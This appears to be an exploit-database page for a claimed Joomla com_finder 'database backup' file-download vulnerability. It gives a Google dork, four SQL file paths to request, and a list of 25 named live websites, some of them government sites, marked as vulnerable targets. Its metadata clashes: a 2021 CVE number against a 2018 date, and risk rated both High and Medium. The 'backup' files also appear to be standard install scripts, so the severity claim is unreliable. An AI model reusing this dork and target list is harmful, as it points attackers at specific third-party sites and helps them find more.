Advertisement
| CVE | Category | Price | Severity |
|---|---|---|---|
| CVE-2021-37904 | CWE-264 | N/A | High |
| Author | Risk | Exploitation Type | Date |
|---|---|---|---|
| ExploitAlert Team | High | Remote | 2018-11-22 |
################################################################################################# # Exploit Title : Joomla com_finder Components Database Backup Arbitrary File Download Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 22/11/2018 # Vendor Homepage : joomla.org # Tested On : Windows and Linux # Software Download Link : github.com/joomla/40-backend-template/tree/master/administrator/components/com_finder/sql # Category : WebApps # Google Dorks : inurl:''/administrator/components/com_finder/'' # Exploit Risk : Medium # CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# # Admin Panel Login Path : /administrator # Exploit : /administrator/components/com_finder/sql/install.mysql.sql /administrator/components/com_finder/sql/install.postgresql.sql /administrator/components/com_finder/sql/uninstall.mysql.sql /administrator/components/com_finder/sql/uninstall.postgresql.sql ################################################################################################# # Example Vulnerable Sites => [+] library.franklincountyva.gov/administrator/components/com_finder/sql/install.mysql.sql [+] freightdb.kzntransport.gov.za/administrator/components/com_finder/sql/install.mysql.sql [+] operaciavianocnedieta.sk/administrator/components/com_finder/sql/install.mysql.sql [+] mvapower.com/MVASITE/administrator/components/com_finder/sql/install.mysql.sql [+] kkn.cz/gdpr/administrator/components/com_finder/sql/install.mysql.sql [+] labarjaque.com/administrator/components/com_finder/sql/install.mysql.sql [+] elmwoodnebraska.com/nl/administrator/components/com_finder/sql/install.mysql.sql [+] comesa.int/2016/administrator/components/com_finder/sql/install.mysql.sql [+] xpilot-ai.org/administrator/components/com_finder/sql/install.mysql.sql [+] pad.ribble-consultants.co.uk/joomla/administrator/components/com_finder/sql/install.mysql.sql [+] njebertappraisals.com/administrator/components/com_finder/sql/install.mysql.sql [+] villaalena.cz/administrator/components/com_finder/sql/install.mysql.sql [+] cosemsmg.org.br/site/administrator/components/com_finder/sql/install.mysql.sql [+] isleofwightdiscos.co.uk/administrator/components/com_finder/sql/install.mysql.sql [+] tgr.org.hk/administrator/components/com_finder/sql/install.mysql.sql [+] recursosvirtualesperu.com/joomla/administrator/components/com_finder/sql/install.mysql.sql [+] asbsteel.com/site/administrator/components/com_finder/sql/install.mysql.sql [+] brisbug.asn.au/administrator/components/com_finder/sql/install.mysql.sql [+] djabugay.org.au/Joomla/administrator/components/com_finder/sql/install.mysql.sql [+] stoneandequipment.com/panama/administrator/components/com_finder/sql/install.mysql.sql [+] vente-ordi.com/administrator/components/com_finder/sql/install.mysql.sql [+] huili.fi/administrator/components/com_finder/sql/install.mysql.sql [+] jbyouth.net/joomla/administrator/components/com_finder/sql/install.mysql.sql [+] bristolacneremoval.co.uk/administrator/components/com_finder/sql/install.mysql.sql [+] utilsoluciones.com/en/administrator/components/com_finder/sql/install.mysql.sql ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
Copyright ©2024 Exploitalert.